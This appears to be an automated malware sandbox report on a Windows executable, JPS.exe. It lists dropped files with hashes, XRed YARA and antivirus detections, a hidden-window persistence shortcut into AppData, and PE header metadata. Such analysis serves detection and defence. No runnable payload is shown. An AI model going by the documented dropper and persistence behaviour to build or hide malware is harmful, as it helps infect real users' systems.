                                                                                                                                                      SHA-512:593EEF1FFC7D2C3B0F5B60ADA40253A051A82CE74F790D35FD0B934F7335CD7DCBC15AAF7A402B32F87B6EDC5D19A327A98A42831CE04D8450E887AAAB22EA99
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2843798526874215
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0LSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+M+pAZewRDK4mW
                                                                                                                                                      MD5:A8753107D5D9C9031C64A807D0CA7618
                                                                                                                                                      SHA1:D6EEC54A59034D735BE550B9A6CA0CEB0A6F6F1A
                                                                                                                                                      SHA-256:096C040940BA70A777CFADFCC10FA855FE89A74A1DE8834062F417201A6BA2DE
                                                                                                                                                      SHA-512:BCC4CE082A33352E24C88CD4C4743BD0125B386BE55072308E9110AD688C1AE9E9B135AB2860364F8D04A9D713C9748EEAC52F0B3BD60675163D525C24F7ED44
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.271655794465192
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+06XDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1z+pAZewRDK4mW
                                                                                                                                                      MD5:CD4C37E937A931F5E2A882BC7AA6B067
                                                                                                                                                      SHA1:8B9A51BF2D99D46B74D9E66778A5D573EADE84C1
                                                                                                                                                      SHA-256:B6E47E6BF904E8ABB28FA4D8BE2CAA11F864CCF41D005AB36DF063B2A2A8E989
                                                                                                                                                      SHA-512:DB58BB4D209ACBA272DF5CBBB030CBEB566CE9A1D0725B303802290025FED3723C347A86D0E47553BADAFAE3902FC8A4F35E8D96F01472666E3370435EF16FD3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.251762009837091
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0rLtozSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Jz+pAZewRDK4mW
                                                                                                                                                      MD5:BAA57AA6E3D923A4DE3495E489EDF14E
                                                                                                                                                      SHA1:4534823A3A7AC097E52A5D4F3A276204EBF1F4F5
                                                                                                                                                      SHA-256:A66B87B05BBA783B492AFC9C32179B3C88D2F8A6593271BA66A59226D44DEC6D
                                                                                                                                                      SHA-512:227429642351B4964333790AFEFC25F109ABD69E4DACFC071DF6A3947206029DFD56A4179ED327A76B9A7326D39F269CFE56F3A33E6C2022FC6BA330B5455641
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.270386565027192
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0yvbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Tb+pAZewRDK4mW
                                                                                                                                                      MD5:414E544B6343FEA1538D88810D6E35AB
                                                                                                                                                      SHA1:673DC60E7A74D574827070B38A547AEA871B3CCA
                                                                                                                                                      SHA-256:9D8BE203AEDA8E5F5F19687961811B5D98ED00E178F95DF58946B0637E363FEA
                                                                                                                                                      SHA-512:DB46313F6B9A1C3278D255B7B6F44377873859E06162D6E150E5115F433084B91A6424F086C1A6F68B909F05A8892351C3B4DA5954FB9F7F8836D8DFDF908723
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.254862930315009
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0gGISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+XGI+pAZewRDK4mW
                                                                                                                                                      MD5:D7681B7AC41815F5FCD02A6A58433BA5
                                                                                                                                                      SHA1:1820AEB0B864C48A410E0BC56D12E20F12ECECDC
                                                                                                                                                      SHA-256:3F204D0EF7D81CF8F22A796BD18732F39F8BDA20B87004FFF8DCCD026545AE97
                                                                                                                                                      SHA-512:6075C8AB74C5BAB3CC605590869E5DB5198BE4C350DF27601B29482D28E1EA4B3CD9A325C0CA920749C2AB6548FD29DFD6B89DB2EE982963ED3B322077C77436
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.261032908279517
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0SSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5+pAZewRDK4mW
                                                                                                                                                      MD5:AA0B4B61DD1BB5A52B20D5DE9EC18185
                                                                                                                                                      SHA1:F9CEDB9D6A7D829CD7963994E54434475DBFB6B7
                                                                                                                                                      SHA-256:4DC951926D6AE25462279EE6CAE565E52C8C2A661F1C10A460914A32ED5FAC20
                                                                                                                                                      SHA-512:85063D1788D584E7C02CEAB568D8CDA0D2D23E9AD36DBC4A556BF9CD11D791F7BD27C9B07CC6A69B62AF1224B3220AC32C8004128B630C627AA9E59D2E792B89
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2598528291361735
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0qzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5+pAZewRDK4mW
                                                                                                                                                      MD5:CD2C27F4DB22B6E39A6CF2A03C0E498A
                                                                                                                                                      SHA1:1AFB78B15D40105634741B07D50435A2B39A1CC8
                                                                                                                                                      SHA-256:88AA23960853C28848270E1FF75A24A94C77227CD9F3AB2F8188EACC7C80AD72
                                                                                                                                                      SHA-512:2B51028D8365D2A9F6679AAC6D664C3FB84AC990B03267D2C8F86371057257AE34C7F2AB56C2543C1E0EF4199D28C26EF11B84E6B0B3DA1B6D1242E8097451FC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2565590488292875
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0KSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+B+pAZewRDK4mW
                                                                                                                                                      MD5:792D30D9A5A90E9D40887FF688DDA41D
                                                                                                                                                      SHA1:24395FD308DBA7657AACE029F7434DC6A1B713DB
                                                                                                                                                      SHA-256:92BD5DCFE3921985BD8D431F748402C6DA56369EE31AFE3166D982FF16B13D5B
                                                                                                                                                      SHA-512:07DFD200908626113CDE0A49CA7FDFCB514C7623207972F2039D874944EEF5B2E4709F4E47EA7037F9E0850D41C072FE3E3ACA80524E5B5999CA57FF482871CA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2792533561180095
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0mGSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6+pAZewRDK4mW
                                                                                                                                                      MD5:176366D743F8489FBAD1D2A653E3E46C
                                                                                                                                                      SHA1:09FF3EB8BBBA7668B50FBE50D8EDE7C33B260C75
                                                                                                                                                      SHA-256:49226BD7E08071D5CF2115F38306E1247DEECF6B601E77D7DBAFF657976A7D42
                                                                                                                                                      SHA-512:1FF6BCF61414B991A86A467E54FB52E78F882788D60CEA109E4AF5E4C06EC98D34D97364BEF4394EB3518FB4EA891FD1FBEEC622A1E9B1000E5D6BB6AF028B82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2484118086867015
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0w7SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+n+pAZewRDK4mW
                                                                                                                                                      MD5:FFE518C9E1F71BC14F7AB6FFDF69895E
                                                                                                                                                      SHA1:7DEDD0D7A9852720155E11468EF24D84F2E4B526
                                                                                                                                                      SHA-256:B527BD3317A699C5F36B58F0748D08138DB24D5E32B9D064F69407E7E8505790
                                                                                                                                                      SHA-512:78FFDAA71718028780D13A34B81BDF5B25027B8556274D06C3580481CEEE06278247CA90D0D160813219863865A6589E419370E369D7E7264B4C4F90D938835E
                                                                                                                                                      Malicious:false
Preview: HTML page titled "Error 404 (Not Found)!!1" (Google error page)
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2565454165552135
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+05cXDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+GQD+pAZewRDK4mW
                                                                                                                                                      MD5:085DD07149A52F7C14D07660B4810F61
                                                                                                                                                      SHA1:3A9F214662032D27542F5322AE46311893E51323
                                                                                                                                                      SHA-256:37589CC5FB682F546047E518BE0663E103B114CBE9B6FCCCE68F63E4D04F81EA
                                                                                                                                                      SHA-512:FAF5F2E4F21CF912CD72917C6ADB5D81121648A0D6CFF8844434FC5C57129E7A20967AABBAFBC7BA2A09DCB0C788E7C9C3E07C0AF43F440A13577E2CBBCDD3E7
                                                                                                                                                      Malicious:false
Preview: HTML page titled "Error 404 (Not Found)!!1" (Google error page)
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.262435463444962
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0OczSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Vi+pAZewRDK4mW
                                                                                                                                                      MD5:B25443D7F2D0BA72410C15F8E9DD961C
                                                                                                                                                      SHA1:22E002E8F12D43432ABB63576C43006229F29D7D
                                                                                                                                                      SHA-256:9546EBBEB6CC83B059B9F8A69C9D7795386F9405CBE158B070E40E7AB1358D4B
                                                                                                                                                      SHA-512:B43DD4347EEB1CF051988C6342A89E6FF12F05A5E64774CC2869FF0A17CA586276DEC6913FDD6B2DCD8EF03DE7A624746911E8D5331DD0E5478400AE0BB0BA67
                                                                                                                                                      Malicious:false
Preview: HTML page titled "Error 404 (Not Found)!!1" (Google error page)
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.266904178812858
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+04wSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Dw+pAZewRDK4mW
                                                                                                                                                      MD5:FCA7A5AB41D9FE8B3E20440ABC9FC02A
                                                                                                                                                      SHA1:569502D19D1713C4E43B70B21611F223221EC770
                                                                                                                                                      SHA-256:C25F020E3662ECFE4A9119B5125BE38D556C3902885339383CBB55C4D3D57582
                                                                                                                                                      SHA-512:9F215AB9F795D176AA3D250A0D68D5DF9332C99E6744DE7AB1DAED3926CB86385DF4D62D55062FB1C341860318431CB9BA12C2E80211F16EFA09D10CABD75323
                                                                                                                                                      Malicious:false
Preview: HTML page titled "Error 404 (Not Found)!!1" (Google error page)
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.257824225857048
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0uSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+d+pAZewRDK4mW
                                                                                                                                                      MD5:AA38A75ECCA80F52D04F46ACCD2931F1
                                                                                                                                                      SHA1:9D75F0E428B3B4213AA30B741171C6DBFFC86469
                                                                                                                                                      SHA-256:FB544F9796C90B77C8870A5101D71E50EB90634DCA9F975AF514C11B677DCB93
                                                                                                                                                      SHA-512:056167C2001038B05F347E52EC467F957CD9B62963CF38FFAF4EBB0C743E58496FAA996C15DC3BE770537D09C115C6F96174AD20B03EFE377194AA10943E9D54
                                                                                                                                                      Malicious:false
Preview: HTML page titled "Error 404 (Not Found)!!1" (Google error page)
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.253802683712044
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0FgDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+mgD+pAZewRDK4mW
                                                                                                                                                      MD5:773E3DBE307E4CB97B16ECE7CF651FCE
                                                                                                                                                      SHA1:A236CCB1D335E996F7112D789BCD223F36E89B7A
                                                                                                                                                      SHA-256:9BFFF3F7C59168CF0573A3019FB4D044D644F1ECC04245EADEADACE29737EBF5
                                                                                                                                                      SHA-512:FE7B66217FF956D4CA7D5BB991ADC0C7EA00E666872F7F18292D1ECC62409A04C0B22FE97161F87C7A53D87B28E29DE8C380C32647217936AF25FBF5DDDAD2E7
                                                                                                                                                      Malicious:false
Preview: HTML page titled "Error 404 (Not Found)!!1" (Google error page)
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):165
                                                                                                                                                      Entropy (8bit):1.3801032810853697
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:UvNFiKVMNv:UvNsKVkv
                                                                                                                                                      MD5:9AA76EF018A0F672FA8DF9799D834C34
                                                                                                                                                      SHA1:75B4E1ADC263E4F966CAD3ECA3A2C84638CA525E
                                                                                                                                                      SHA-256:ED0F89EA4BAE07B1876B61240D06D56CDDB5CE83EF10E41F68142378CB750B77
                                                                                                                                                      SHA-512:6A8AF40C8225E60E652BCCB7D7E7FF03A8A014A7AC782D620AA6120B134213D4A4E279EF0005FCCBA513E85785E7CF6EA42422A6E936F4F690E47D0AAD11AA77
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.user ..t.o.t.t.i. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):32768
                                                                                                                                                      Entropy (8bit):3.746897789531007
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                                      MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                                      SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                                      SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                                      SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Users\user\Desktop\._cache_JPS.exe
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:25:21 2024, mtime=Mon Dec 30 09:25:21 2024, atime=Mon Dec 30 09:25:21 2024, length=1217536, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1805
                                                                                                                                                      Entropy (8bit):3.4171175826202704
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8GdbPfr2Ce2dkwHAzTwKE2+s9T4IlNNm:8GdbHrPhgzfr9MIlH
                                                                                                                                                      MD5:3DCE858FB3F04D0C2FC20F894BBE8150
                                                                                                                                                      SHA1:1E5A0ED8502A3DB8D918837CDC6D26BC880AFD84
                                                                                                                                                      SHA-256:79DFC580224DEC9C7D9951E7506C71846E466DC917961F24975D76E34867D35E
                                                                                                                                                      SHA-512:2207C8EE7E661E9915D7820A33255BDF845BB2F129327959B7D2CA39991C2244539937F2083D7B26E6D574207DD777A33D66A78A3B57BA592CB698DDFFD5FB5C
                                                                                                                                                      Malicious:false
Preview: shortcut to C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe, icon from %SystemRoot%\SysWOW64\shell32.dll
                                                                                                                                                      Process:C:\Users\user\Desktop\._cache_JPS.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1217536
                                                                                                                                                      Entropy (8bit):6.928149757710278
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:DXe9PPlowWX0t6mOQwg1Qd15CcYk0We15Ue7Okfn0ik9Ya0xMYPLAtF5WyNn2fQ6:qhloDX0XOf44e7JFtxAnWe2fxYBQ
                                                                                                                                                      MD5:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      SHA1:CE7D9083A3A7A5A7F627CF1CDC4946756DF3AAA9
                                                                                                                                                      SHA-256:7DF6C8D2B3479312E1E8BF177D58E7F69C11B932177F288C0FC0D2AEE2F869D7
                                                                                                                                                      SHA-512:A27903F33A6B7B6B003EE5CB80B7FF640EF24D1CA635CE79D15DE94F69E6B2BDC8CA3E6E699F130BBC9E6D629312CC48216624A6110CAA068C532AA9133646E2
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                      Process:C:\Users\user\Desktop\JPS.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1217536
                                                                                                                                                      Entropy (8bit):6.928149757710278
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:DXe9PPlowWX0t6mOQwg1Qd15CcYk0We15Ue7Okfn0ik9Ya0xMYPLAtF5WyNn2fQ6:qhloDX0XOf44e7JFtxAnWe2fxYBQ
                                                                                                                                                      MD5:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      SHA1:CE7D9083A3A7A5A7F627CF1CDC4946756DF3AAA9
                                                                                                                                                      SHA-256:7DF6C8D2B3479312E1E8BF177D58E7F69C11B932177F288C0FC0D2AEE2F869D7
                                                                                                                                                      SHA-512:A27903F33A6B7B6B003EE5CB80B7FF640EF24D1CA635CE79D15DE94F69E6B2BDC8CA3E6E699F130BBC9E6D629312CC48216624A6110CAA068C532AA9133646E2
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):18387
                                                                                                                                                      Entropy (8bit):7.523057953697544
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                      MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                      SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                      SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                      SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):165
                                                                                                                                                      Entropy (8bit):1.3801032810853697
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:UvNFiKVMNv:UvNsKVkv
                                                                                                                                                      MD5:9AA76EF018A0F672FA8DF9799D834C34
                                                                                                                                                      SHA1:75B4E1ADC263E4F966CAD3ECA3A2C84638CA525E
                                                                                                                                                      SHA-256:ED0F89EA4BAE07B1876B61240D06D56CDDB5CE83EF10E41F68142378CB750B77
                                                                                                                                                      SHA-512:6A8AF40C8225E60E652BCCB7D7E7FF03A8A014A7AC782D620AA6120B134213D4A4E279EF0005FCCBA513E85785E7CF6EA42422A6E936F4F690E47D0AAD11AA77
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.user ..t.o.t.t.i. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):771584
                                                                                                                                                      Entropy (8bit):6.632480030468604
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Igr:ansJ39LyjbJkQFMhmC+6GD9n
                                                                                                                                                      MD5:B50AAC59E97F3D38A19ACB9253FABEBC
                                                                                                                                                      SHA1:F44DA6758D62D39C9F96E18763DCA6FC858385EF
                                                                                                                                                      SHA-256:634238998B9CA21CE7558C5410FFD9D21E42AC069FFEB1B590EED99BAC7C1F02
                                                                                                                                                      SHA-512:B8B07692BF6770D1F67F5A9CCE809F9B20EDCA21E7480151D0FA35AC1CFC61CBA5953B0475CAAA3C4892860C0CEE287E689E50FC1727CE9533FD87A85DA820B4
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                      Entropy (8bit):4.298825706779003
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:hECqOEmWfd+WQFHy/9026ZTyaRsCDusBqD5dooi8lISD6VJSRxL:2CsL6seqD5S9SWVARx
                                                                                                                                                      MD5:399355DE8F482DA9C9052871F7D6B35C
                                                                                                                                                      SHA1:734984296D4564B48D8451ADB58F247BA69A1A18
                                                                                                                                                      SHA-256:47015DC02540147B5AAFA4C3789C7F11007BC2CF2FB3A45D369092F4865F72A0
                                                                                                                                                      SHA-512:9ADC967F38E2158AEC48F210E3853B0B4AD95BA10087AA6656ECF9DD0941C635663B818F3C7E095252B7526CEA6E0156F9D2751BEAD4CBB31F9B120C17BDEDA0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmn..6.Z..............................................................................................................................................................................................................................................................................................................................................m...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Entropy (8bit):6.934025794433937
                                                                                                                                                      TrID:
                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 93.09%
                                                                                                                                                      • Win32 Executable Borland Delphi 7 (665061/41) 6.19%
                                                                                                                                                      • UPX compressed Win32 Executable (30571/9) 0.28%
                                                                                                                                                      • Win32 EXE Yoda's Crypter (26571/9) 0.25%
                                                                                                                                                      • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                                                      File name:JPS.exe
                                                                                                                                                      File size:1'989'120 bytes
                                                                                                                                                      MD5:290a46d2614f4ce4f7ad75d2cea2ce23
                                                                                                                                                      SHA1:cc9f762b21f649252881087b2ff56e88d4b5a6f1
                                                                                                                                                      SHA256:7cbe965fa1278ba09c31e191c19ac1e2b52f940b656273872c805833ae03e276
                                                                                                                                                      SHA512:2a6d87585971cf166d4df1b2bcfe80a8b066d1cf4cbf646addf0735b62644ab5d9624b635aa1ba89b0b36107fd2899bec2f95d6a55d2faff579272e1e758fe98
                                                                                                                                                      SSDEEP:24576:8nsJ39LyjbJkQFMhmC+6GD9bhloDX0XOf44e7JFtxAnWe2fxYBQl:8nsHyjtk2MYC5GDxhloJfXnWbfxp
                                                                                                                                                      TLSH:8595D022F2919C37D1325A399C5BA3B5583EBE532E34694A7BE43F4C4E3D2412BD4293
                                                                                                                                                      Icon Hash:c338dad2da985006
                                                                                                                                                      Entrypoint:0x49ab80
                                                                                                                                                      Entrypoint Section:CODE
                                                                                                                                                      Digitally signed:false
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                      DLL Characteristics:
                                                                                                                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                      TLS Callbacks:
                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                      OS Version Major:4
                                                                                                                                                      OS Version Minor:0
                                                                                                                                                      File Version Major:4
                                                                                                                                                      File Version Minor:0
                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                      Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                                                                                      Instruction
                                                                                                                                                      push ebp
                                                                                                                                                      mov ebp, esp
                                                                                                                                                      add esp, FFFFFFF0h
                                                                                                                                                      mov eax, 0049A778h
                                                                                                                                                      call 00007F04C4C6BBBDh
                                                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                                      call 00007F04C4CBF505h
